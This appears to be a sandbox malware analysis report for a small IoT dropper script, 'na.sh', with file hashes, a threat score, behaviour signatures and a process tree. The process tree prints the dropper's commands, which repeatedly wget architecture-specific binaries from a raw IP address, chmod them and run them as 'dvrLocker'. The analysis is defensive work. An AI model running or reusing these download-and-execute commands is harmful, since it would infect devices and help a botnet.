Overview

overview

7

Static

static

1

na.sh

ubuntu-18.04-amd64

7

na.sh

debian-9-armhf

7

na.sh

debian-9-mips

7

na.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    150s
  • max time network
    133s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    10-10-2024 07:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    na.sh

  • Size

    372B

  • MD5

    6b2644c0adca68c54a53a79842eb3b3c

  • SHA1

    d26ec0f0fc70fcb713aba5fa56912809cefb8bc0

  • SHA256

    89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f

  • SHA512

    943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c

Score
7/10
credential_accessdefense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads process memory 1 TTPs 4 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

    credential_access
  • Changes its process name 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/na.sh
    /tmp/na.sh
    1⤵
    • Writes file to tmp directory
    PID:703
    • /bin/rm
      rm -rf dvrLocker
      2⤵
        PID:705
      • /usr/bin/wget
        wget http://185.157.247.125/c/empsl -O -
        2⤵
          PID:706
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:724
        • /dvrLocker
          ./dvrLocker tplink.new
          2⤵
          • Executes dropped EXE
          PID:726
        • /usr/bin/wget
          wget http://185.157.247.125/c/emips -O -
          2⤵
          • System Network Configuration Discovery
          PID:728
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:734
        • /dvrLocker
          ./dvrLocker tplink.new
          2⤵
          • Deletes itself
          • Executes dropped EXE
          • Reads process memory
          • Changes its process name
          • Reads runtime system information
          PID:736
        • /usr/bin/wget
          wget http://185.157.247.125/c/earm -O -
          2⤵
            PID:738
          • /bin/chmod
            chmod 777 dvrLocker
            2⤵
            • File and Directory Permissions Modification
            PID:740
          • /dvrLocker
            ./dvrLocker tplink.new
            2⤵
            • Executes dropped EXE
            PID:747
          • /bin/sh
            /bin/sh ./dvrLocker tplink.new
            2⤵
              PID:747
            • /usr/bin/wget
              wget http://185.157.247.125/c/earm7 -O -
              2⤵
                PID:749
              • /bin/chmod
                chmod 777 dvrLocker
                2⤵
                • File and Directory Permissions Modification
                PID:750
              • /dvrLocker
                ./dvrLocker tplink.new
                2⤵
                • Executes dropped EXE
                PID:753
              • /bin/sh
                /bin/sh ./dvrLocker tplink.new
                2⤵
                  PID:753
                • /usr/bin/wget
                  wget http://185.157.247.125/c/ex86 -O -
                  2⤵
                    PID:759
                  • /bin/chmod
                    chmod 777 dvrLocker
                    2⤵
                    • File and Directory Permissions Modification
                    PID:760
                  • /dvrLocker
                    ./dvrLocker tplink.new
                    2⤵
                    • Executes dropped EXE
                    PID:762
                  • /bin/sh
                    /bin/sh ./dvrLocker tplink.new
                    2⤵
                      PID:762

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /dvrLocker
                    Filesize

                    41KB

                    MD5

                    3cfc76868e26201ac03e0583b7c8aaba

                    SHA1

                    03436d9d090e1f944fecf60adc1e45f90df20c26

                    SHA256

                    8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d

                    SHA512

                    84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2

                    Download Submit

                  • /dvrLocker
                    Filesize

                    40KB

                    MD5

                    c0b34d8a59f793b636b5424b8e96a64a

                    SHA1

                    d5eac6c7b3a5953ffcd642de9db2cd1c45463e96

                    SHA256

                    defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270

                    SHA512

                    57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4

                    Download Submit